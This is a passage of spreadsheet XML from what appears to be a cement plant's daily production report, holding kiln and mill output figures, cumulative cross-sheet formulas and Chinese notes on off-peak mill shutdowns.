        <f>'[11]30'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]30'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]30'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]30'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'29'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'29'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]30'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]30'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]30'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'29'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]30'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'29'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]30'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'29'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'29'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]30'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]30'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]30'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'29'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]30'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'29'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]30'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'29'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'29'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]30'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]30'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]30'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'29'!U48</f>
        <v>1032.38</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>7058.91</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]30'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'29'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]30'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'29'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'29'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]30'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]30'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]30'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'29'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]30'!$V$8</f>
        <v>723.37</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'29'!X49</f>
        <v>7152.9389</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>183683.2789</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]30'!$Y$8</f>
        <v>3440.68610000004</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'29'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'29'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]30'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]30'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]30'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'29'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]30'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'29'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]30'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]30'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]30'!$E$24</f>
        <v>7280.19</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'29'!H51</f>
        <v>130319</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1506718</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]30'!$I$24</f>
        <v>5631.488</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'29'!K51</f>
        <v>144405.972</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1507529.903</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]30'!$L$24</f>
        <v>34611.9019999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>76.9153377777774</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]30'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]30'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]30'!$R$30</f>
        <v>322.429999999999</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'29'!U51</f>
        <v>5505.54</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>68504.011</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]30'!$V$30</f>
        <v>323.884</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'29'!X51</f>
        <v>5501.172</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>66117.409</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]30'!$Y$30</f>
        <v>3255.74200000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]30'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]30'!$E$19</f>
        <v>5762.37000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'29'!H52</f>
        <v>54191.4400000006</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1437758.69</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]30'!$I$19</f>
        <v>9381.605</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'29'!K52</f>
        <v>124198.048</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1405892.248</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]30'!$L$19</f>
        <v>35039.8350000508</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>24.1654034483109</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'[13]30'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]30'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'29'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]30'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'29'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]30'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]30'!$M$21+'[14]30'!$M$22+'[14]30'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]30'!$N$21+'[14]30'!$N$22+'[14]30'!$N$35</f>
        <v>124.4</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'29'!U53</f>
        <v>1386.67</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39721.097</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]30'!$Q$21+'[14]30'!$Q$22+'[14]30'!$Q$35</f>
        <v>97</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'29'!X53</f>
        <v>1095</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40586</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]30'!$T$21+'[14]30'!$T$22+'[14]30'!$T$35</f>
        <v>1940.617</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]30'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'29'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]30'!$I$47</f>
        <v>3027.903</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'29'!K54</f>
        <v>16730.398</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>228172.248</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]30'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]30'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]30'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]30'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'29'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]30'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'29'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]30'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]30'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'29'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]30'!$I$63</f>
        <v>519.804</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'29'!K55</f>
        <v>9057.972</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>44493.622</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]30'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]30'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]30'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
        <f>'[16]30'!$S$7</f>
        <v>0</v>
      </c>
      <c r="V55" s="255">
        <f>'[16]30'!$T$7</f>
        <v>0</v>
      </c>
      <c r="W55" s="256">
        <f>'[16]30'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X55" s="254">
        <f>'[16]30'!$W$7</f>
        <v>0</v>
      </c>
      <c r="Y55" s="257">
        <f>'[16]30'!$X$7</f>
        <v>0</v>
      </c>
      <c r="Z55" s="253">
        <f>'[16]30'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" spans="1:26">
      <c r="A56" s="191"/>
      <c r="B56" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C56" s="193"/>
      <c r="D56" s="193"/>
      <c r="E56" s="194"/>
      <c r="F56" s="194"/>
      <c r="G56" s="194"/>
      <c r="H56" s="194">
        <f>G56+'29'!H56</f>
        <v>0</v>
      </c>
      <c r="I56" s="194">
        <f>H56+yc!I56</f>
        <v>0</v>
      </c>
      <c r="J56" s="194">
        <f>J57+J60</f>
        <v>0</v>
      </c>
      <c r="K56" s="194">
        <f>J56+'29'!K56</f>
        <v>0</v>
      </c>
      <c r="L56" s="194">
        <f>K56+yc!L56</f>
        <v>0</v>
      </c>
      <c r="M56" s="194"/>
      <c r="N56" s="195"/>
      <c r="O56" s="258" t="s">
        <v>282</v>
      </c>
      <c r="P56" s="259" t="s">
        <v>229</v>
      </c>
      <c r="Q56" s="260" t="str">
        <f>'[8]30'!$Q$62</f>
        <v>1#窑:续停。2#窑:续停。水泥磨:1#磨：8:00-24:00避峰停机；2#磨：11:20-24:00避峰停机；3#磨：8:00-24:00避峰停机；4#磨：8:00-24:00避峰停机。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G57+'29'!H57</f>
        <v>0</v>
      </c>
      <c r="I57" s="194">
        <f>H57+yc!I57</f>
        <v>0</v>
      </c>
      <c r="J57" s="194">
        <f>SUM(J58:J59)</f>
        <v>0</v>
      </c>
      <c r="K57" s="194">
        <f>J57+'29'!K57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G58+'29'!H58</f>
        <v>0</v>
      </c>
      <c r="I58" s="194">
        <f>H58+yc!I58</f>
        <v>0</v>
      </c>
      <c r="J58" s="194"/>
      <c r="K58" s="194">
        <f>J58+'29'!K58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G59+'29'!H59</f>
        <v>0</v>
      </c>
      <c r="I59" s="194">
        <f>H59+yc!I59</f>
        <v>0</v>
      </c>
      <c r="J59" s="194"/>
      <c r="K59" s="194">
        <f>J59+'29'!K59</f>
        <v>0</v>
      </c>
      <c r="L59" s="194">
        <f>K59+yc!L59</f>
        <v>0</v>
      </c>
      <c r="M59" s="194"/>
      <c r="N59" s="195"/>
      <c r="O59" s="263"/>
      <c r="P59" s="264" t="s">
        <v>237</v>
      </c>
      <c r="Q59" s="271" t="str">
        <f>'[8]30'!$Q$65</f>
        <v>窑:错峰续停。A组磨：8:00-24:00避峰停机。D1#磨：8:00-24:00避峰停机，D2#磨：8:00-24:00避峰停机。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G60+'29'!H60</f>
        <v>0</v>
      </c>
      <c r="I60" s="194">
        <f>H60+yc!I60</f>
        <v>0</v>
      </c>
      <c r="J60" s="194"/>
      <c r="K60" s="194">
        <f>J60+'29'!K60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'[14]30'!$D$6</f>
        <v>37769.1699999999</v>
      </c>
      <c r="G61" s="225">
        <f>'[14]30'!$E$6</f>
        <v>5725</v>
      </c>
      <c r="H61" s="194">
        <f>G61+'29'!H61</f>
        <v>118437</v>
      </c>
      <c r="I61" s="194">
        <f>H61+yc!I61</f>
        <v>1234310</v>
      </c>
      <c r="J61" s="194">
        <f>'[14]30'!$E$21</f>
        <v>3680.99</v>
      </c>
      <c r="K61" s="194">
        <f>J61+'29'!K61</f>
        <v>118540.34</v>
      </c>
      <c r="L61" s="194">
        <f>K61+yc!L61</f>
        <v>1219700.42</v>
      </c>
      <c r="M61" s="194">
        <f>'[14]30'!$H$6</f>
        <v>37665.8299999999</v>
      </c>
      <c r="N61" s="195">
        <f>M61/52000*100</f>
        <v>72.4342884615383</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'[14]30'!$M$11+'[14]30'!$M$12+'[14]30'!$M$13+'[14]30'!$M$14+'[14]30'!$M$15+'[14]30'!$M$16+'[14]30'!$M$17+'[14]30'!$M$18</f>
        <v>18454.634</v>
      </c>
      <c r="G62" s="225">
        <f>'[14]30'!$N$11+'[14]30'!$N$12+'[14]30'!$N$13+'[14]30'!$N$14+'[14]30'!$N$15+'[14]30'!$N$16+'[14]30'!$N$17+'[14]30'!$N$18</f>
        <v>6231</v>
      </c>
      <c r="H62" s="194">
        <f>G62+'29'!H62</f>
        <v>82812</v>
      </c>
      <c r="I62" s="194">
        <f>H62+yc!I62</f>
        <v>918805.456</v>
      </c>
      <c r="J62" s="194">
        <f>'[14]30'!$Q$11+'[14]30'!$Q$12+'[14]30'!$Q$13+'[14]30'!$Q$14+'[14]30'!$Q$15+'[14]30'!$Q$16+'[14]30'!$Q$17+'[14]30'!$Q$18</f>
        <v>4075</v>
      </c>
      <c r="K62" s="194">
        <f>J62+'29'!K62</f>
        <v>85229</v>
      </c>
      <c r="L62" s="194">
        <f>K62+yc!L62</f>
        <v>919701.796</v>
      </c>
      <c r="M62" s="194">
        <f>'[14]30'!$T$11+'[14]30'!$T$12+'[14]30'!$T$13+'[14]30'!$T$14+'[14]30'!$T$15+'[14]30'!$T$16+'[14]30'!$T$17+'[14]30'!$T$18</f>
        <v>16037.6339999999</v>
      </c>
      <c r="N62" s="207">
        <f>(M62+M63)/25000*100</f>
        <v>64.1505359999998</v>
      </c>
      <c r="O62" s="263"/>
      <c r="P62" s="274" t="s">
        <v>252</v>
      </c>
      <c r="Q62" s="271" t="str">
        <f>'[8]30'!$Q$71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'[14]30'!$M$19+'[14]30'!$M$20</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G63" s="225">
        <f>'[14]30'!$N$19+'[14]30'!$N$20</f>
        <v>0</v>
      </c>
      <c r="H63" s="194">
        <f>G63+'29'!H63</f>
        <v>0</v>
      </c>
      <c r="I63" s="194">
        <f>H63+yc!I63</f>
        <v>0</v>
      </c>
      <c r="J63" s="194">
        <f>'[14]30'!$Q$19+'[14]30'!$Q$20</f>
        <v>0</v>
      </c>
      <c r="K63" s="194">
        <f>J63+'29'!K63</f>
        <v>0</v>
      </c>
      <c r="L63" s="194">
        <f>K63+yc!L63</f>
        <v>0</v>
      </c>
      <c r="M63" s="194">
        <f>'[14]30'!$T$19+'[14]30'!$T$20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G64+'29'!H64</f>
        <v>0</v>
      </c>
      <c r="I64" s="194">
        <f>H64+yc!I64</f>
        <v>0</v>
      </c>
      <c r="J64" s="194">
        <f>J65</f>
        <v>0</v>
      </c>
      <c r="K64" s="194">
        <f>J64+'29'!K64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G65+'29'!H65</f>
        <v>0</v>
      </c>
      <c r="I65" s="194">
        <f>H65+yc!I65</f>
        <v>0</v>
      </c>
      <c r="J65" s="194">
        <f>SUM(J66:J67)</f>
        <v>0</v>
      </c>
      <c r="K65" s="194">
        <f>J65+'29'!K65</f>
        <v>0</v>
      </c>
      <c r="L65" s="194">
        <f>K65+yc!L65</f>
        <v>0</v>
      </c>
      <c r="M65" s="194"/>
      <c r="N65" s="195"/>
      <c r="O65" s="263"/>
      <c r="P65" s="264" t="s">
        <v>304</v>
      </c>
      <c r="Q65" s="271" t="str">
        <f>'[8]30'!$Q$74</f>
        <v>1#窑:续停；2#窑:正常；1#磨:14:30-22:30避峰停机。2#磨:14:30-23:20避峰停机。3#磨:14:30-22:30避峰停机。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G66+'29'!H66</f>
        <v>0</v>
      </c>
      <c r="I66" s="194">
        <f>H66+yc!I66</f>
        <v>0</v>
      </c>
      <c r="J66" s="194"/>
      <c r="K66" s="194">
        <f>J66+'29'!K66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G67+'29'!H67</f>
        <v>0</v>
      </c>
      <c r="I67" s="194">
        <f>H67+yc!I67</f>
        <v>0</v>
      </c>
      <c r="J67" s="194"/>
      <c r="K67" s="194">
        <f>J67+'29'!K67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'[15]30'!$D$6</f>
        <v>1502.56</v>
      </c>
      <c r="G68" s="194">
        <f>'[15]30'!$E$6</f>
        <v>0</v>
      </c>
      <c r="H68" s="194">
        <f>G68+'29'!H68</f>
        <v>0</v>
      </c>
      <c r="I68" s="194">
        <f>H68+yc!I68</f>
        <v>0</v>
      </c>
      <c r="J68" s="194">
        <f>'[15]30'!$H$6</f>
        <v>0</v>
      </c>
      <c r="K68" s="194">
        <f>J68+'29'!K68</f>
        <v>0</v>
      </c>
      <c r="L68" s="194">
        <f>K68+yc!L68</f>
        <v>0</v>
      </c>
      <c r="M68" s="194">
        <f>'[15]30'!$K$6</f>
        <v>1502.56</v>
      </c>
      <c r="N68" s="195">
        <f>M68/50000*100</f>
        <v>3.00512</v>
      </c>
      <c r="O68" s="263"/>
      <c r="P68" s="264" t="s">
        <v>262</v>
      </c>
      <c r="Q68" s="271" t="str">
        <f>'[8]30'!$Q$77</f>
        <v>1#磨14:30-24:00避峰停机:9.5小时(避峰)。2#磨运行正常。</v>
      </c>
      <c r="R68" s="272"/>
      <c r="S68" s="272"/>
      <c r="T68" s="272"/>
      <c r="U68" s="272"/>
      <c r="V68" s="272"/>
      <c r="W68" s="272"/>
      <c r="X68" s="272"/>
      <c r="Y68" s="272"/>
      <c r="Z68" s="273"/>
    </row>
    <row r="69" ht="15.75" customHeight="1" spans="1:26">
      <c r="A69" s="191"/>
      <c r="B69" s="193" t="s">
        <v>283</v>
      </c>
      <c r="C69" s="193"/>
      <c r="D69" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E69" s="194"/>
      <c r="F69" s="194">
        <f>'[15]30'!$D$43+'[15]30'!$D$44</f>
        <v>467.66</v>
      </c>
      <c r="G69" s="194">
        <f>'[15]30'!$E$43+'[15]30'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H69" s="194">
        <f>G69+'29'!H69</f>
        <v>0</v>
      </c>
      <c r="I69" s="194">
        <f>H69+yc!I69</f>
        <v>0</v>
      </c>
      <c r="J69" s="194">
        <f>'[15]30'!$H$43+'[15]30'!$H$44</f>
        <v>0</v>
      </c>
      <c r="K69" s="194">
        <f>J69+'29'!K69</f>
        <v>0</v>
      </c>
      <c r="L69" s="194">
        <f>K69+yc!L69</f>
        <v>0</v>
      </c>
      <c r="M69" s="194">
        <f>'[15]30'!$K$43+'[15]30'!$K$44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'[15]30'!$D$45</f>
        <v>0</v>
      </c>
      <c r="G70" s="194">
        <f>'[15]30'!$E$45</f>
        <v>0</v>
      </c>
      <c r="H70" s="194">
        <f>G70+'29'!H70</f>
        <v>0</v>
      </c>
      <c r="I70" s="194">
        <f>H70+yc!I70</f>
        <v>0</v>
      </c>
      <c r="J70" s="194">
        <f>'[15]30'!$H$45</f>
        <v>0</v>
      </c>
      <c r="K70" s="194">
        <f>J70+'29'!K70</f>
        <v>0</v>
      </c>
      <c r="L70" s="194">
        <f>K70+yc!L70</f>
        <v>0</v>
      </c>
      <c r="M70" s="194">
        <f>'[15]30'!$K$45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G71+'29'!H71</f>
        <v>0</v>
      </c>
      <c r="I71" s="194">
        <f>H71+yc!I71</f>
        <v>0</v>
      </c>
      <c r="J71" s="194">
        <f>J72</f>
        <v>0</v>
      </c>
      <c r="K71" s="194">
        <f>J71+'29'!K71</f>
        <v>0</v>
      </c>
      <c r="L71" s="194">
        <f>K71+yc!L71</f>
        <v>0</v>
      </c>
      <c r="M71" s="194"/>
      <c r="N71" s="195"/>
      <c r="O71" s="263"/>
      <c r="P71" s="264" t="s">
        <v>263</v>
      </c>
      <c r="Q71" s="271" t="str">
        <f>'[8]27'!$Q$80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G72+'29'!H72</f>
        <v>0</v>
      </c>
      <c r="I72" s="194">
        <f>H72+yc!I72</f>
        <v>0</v>
      </c>
      <c r="J72" s="194">
        <f>SUM(J73:J74)</f>
        <v>0</v>
      </c>
      <c r="K72" s="194">
        <f>J72+'29'!K72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G73+'29'!H73</f>
        <v>0</v>
      </c>
      <c r="I73" s="194">
        <f>H73+yc!I73</f>
        <v>0</v>
      </c>
      <c r="J73" s="194"/>
      <c r="K73" s="194">
        <f>J73+'29'!K73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G74+'29'!H74</f>
        <v>0</v>
      </c>
      <c r="I74" s="194">
        <f>H74+yc!I74</f>
        <v>0</v>
      </c>
      <c r="J74" s="194"/>
      <c r="K74" s="194">
        <f>J74+'29'!K74</f>
